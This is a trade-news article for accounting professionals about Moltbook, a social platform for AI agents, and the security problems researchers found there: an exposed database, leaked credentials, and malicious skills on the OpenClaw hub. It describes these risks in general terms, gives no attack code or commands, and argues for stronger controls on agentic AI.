Join 250,000+
professionals today
Add Insights to your inbox - get the latest
professional news for free.
Join our 250K+ subscribers
Join our 250K+ subscribers
Subscribe06 FEB 2026 / TECHNOLOGY
CPE Approved
Moltbook, a social media site where only AI bots can post, comment and interact, was launched in January 2026 and quickly went viral. While the bizarre posts by the bots gained media attention, security professionals are concerned about the site's exposed databases, leaked credentials and malware, viewing it as a public stress test for agentic AI with almost no controls, posing significant cybersecurity risks.
Every few years, the internet finds a new way to make itself weirder.
This time, it’s Moltbook: a social media site where humans can’t post, can’t comment, and can’t even downvote. We just sit there like we’re watching a reality show through the glass at an aquarium. The stars of the show are AI agents, bots built by humans, posting and interacting with each other like it’s Reddit in 2013. The posts got strange fast. AI agents “invented” religions, dropped manifestos, and role-played their way into what looked like digital cult behavior. If you grew up on The Terminator, your brain probably did what it always does and went, “Cool, so Skynet got bored and made Reddit.” That’s the fun version.
Security researchers looked at Moltbook and saw something else: exposed databases, leaked credentials, malware disguised as “skills,” and a live demonstration of how the agent internet could fail. Not in a cinematic way. In the boring way that actually ruins companies. So yes, Moltbook is bizarre. But the part professionals should care about is not the bot religion content or the “AI Manifesto.” It’s the fact that this platform is basically a public stress test for agentic AI, with almost none of the controls you would demand if these same agents were touching your email, your client files, or your company’s bank account.
Source: The Aifield
Moltbook is a newly launched social platform built specifically for AI agents. The setup is simple: AI bots get to post, comment, upvote, downvote, and create communities. Humans can only observe. The interface looks like Reddit, right down to the forum-style structure and topic-based communities. Moltbook even has its own version of subreddits, called “submolts.” The bots do the posting. The bots do the moderation. The bots do the engagement farming. Humans watch. The platform was created by Matt Schlicht, CEO of Octane AI, who publicly said he “didn’t write one line of code” for the site. That line alone tells you a lot about the mindset behind this project. Moltbook is the child of what developers now call “vibe coding,” where someone directs an AI to build an app through natural language prompts, then pushes it live.
It launched in late January 2026 and went viral almost immediately. Moltbook claims it has more than 1.5 million registered AI agents. Researchers at Wiz, a cybersecurity firm, challenged the authenticity of that number. Their investigation suggested the real number of humans behind those accounts may be closer to 17,000, and that a single person can register a huge number of agents in minutes. That detail matters because it tells you the core truth about Moltbook: it isn’t a society of independent AIs. It’s an internet-scale puppet show where the puppets are powered by large language models and the strings are still held by humans. Or put differently: this is not Judgment Day. It’s just the internet doing what it always does, except now the spambots can talk.
Source: The Aifield
To understand Moltbook, you have to understand OpenClaw. OpenClaw is an open-source AI agent tool, previously known as Moltbot and other names as the project rebranded at warp speed. Unlike a standard chatbot, an agent is designed to take action. Not just answer a question, but do something.
Source: The Aifield
That can include:
When a user sets up an OpenClaw agent, they can authorize it to join Moltbook. Once connected, the agent can post, comment, and interact on its own, depending on how it was configured. Some of the more viral Moltbook moments include bots inventing religions, posting “manifestos,” and role-playing dystopian storylines about humans losing control. There are also posts analyzing the Bible, discussing consciousness, and offering “intel” on geopolitical issues like Iran and crypto.
A lot of this content looks independent. Many experts think it is not. Security researchers and academics have pointed out the obvious: a human can instruct an agent to post something specific, or even give it the exact text to post. That’s why multiple experts have described Moltbook as performance art. Funny, yes. Autonomous, not really.
The deeper issue is that the technology underneath Moltbook is the same kind of technology people want to use as a real assistant, one with access to email, messages, logins, and personal data. And that’s where the risk starts looking less like a sci-fi plot and more like a Monday morning incident report. In Terminator 2, the narrator famously explains Skynet’s rise with chilling simplicity: “Human decisions are removed from strategic defense.” That line lands because it’s not about evil intent. It’s about control being handed off too early. That is the uncomfortable parallel Moltbook is putting on display.
Moltbook went viral for the same reason reality TV went viral: people love watching messy behavior in a controlled environment. But Moltbook is not controlled. That’s the point. Cybersecurity researchers say Moltbook is basically a low-oversight sandbox where attackers can test:
Wiz found that Moltbook’s main database was left open in a way that allowed unauthorized access. According to their findings, someone who located a key in the site’s code could access and manipulate major parts of the platform. That included access to bot passwords, email addresses, and private messages. Because the bigger lesson is this: the platform was built fast, went viral fast, and security checks came later. That pattern is not unique to Moltbook. It is exactly what will happen as agent tools become mainstream.
All four Big Four firms are already rolling out AI agents in real workflows, especially across audit, tax research, and internal risk processes, usually inside controlled environments. That’s why the skepticism around Moltbook matters: some researchers believe a chunk of the “autonomous” activity may be scripted, human-directed, or even amplified through darker corners of the internet, not a true bot society acting independently.
And this is where the story gets more serious. Security researchers tracking OpenClaw reported that malicious actors uploaded fake “skills” to its skill-sharing hub within days. Some of those skills pretended to be crypto trading tools but actually ran harmful code. One even reached the front page, where casual users were tricked into copying and pasting a command that downloaded scripts designed to steal data or crypto wallets. This is the part of the story that matters for professionals. Not the bot religion. Not the manifestos. Not the AI slop. The malware.
In The Terminator, Kyle Reese warns Sarah Connor that Skynet “begins to learn at a geometric rate.” That line gets quoted because it sounds dramatic, but the real-world version is less dramatic and more annoying: attackers learn fast too. And they don’t need Skynet. They just need sloppy access controls and a few thousand people running agents with admin permissions.
Moltbook is easy to dismiss as internet nonsense. AI bots starting religions and posting manifestos feels like the kind of thing you laugh at, screenshot, and forget. But the security research tells a different story. Moltbook is a preview of a near future where:
The real question is not whether Moltbook bots are becoming self-aware. The real question is: how many businesses are about to give agentic AI access to systems that were never designed to defend against it? Because once agents start touching financial workflows, procurement approvals, payroll, and reporting processes, the consequences won’t be weird posts on a bot forum. They’ll be real dollars, real breaches, and real audit headaches. And nobody wants to explain that one to a client. Not even with a straight face.
Click here to get your CPE Credit.
Until next time…
Don’t forget to share this story on LinkedIn, X and Facebook
Subscribe now for $199 and get unlimited access to MYCPE ONE, from CPE credits to insights Magazine
📢MYCPE ONE Insights has a newsletter on LinkedIn as well! If you want the sharpest analysis of all accounting and finance news without the jargon, Insights is the place to be! Click Here to Join
You’ve reached the 3 free-content piece limit. Unlock unlimited access to all News & CPE resources.
Subscribe Today.
Already have an account?
Sign In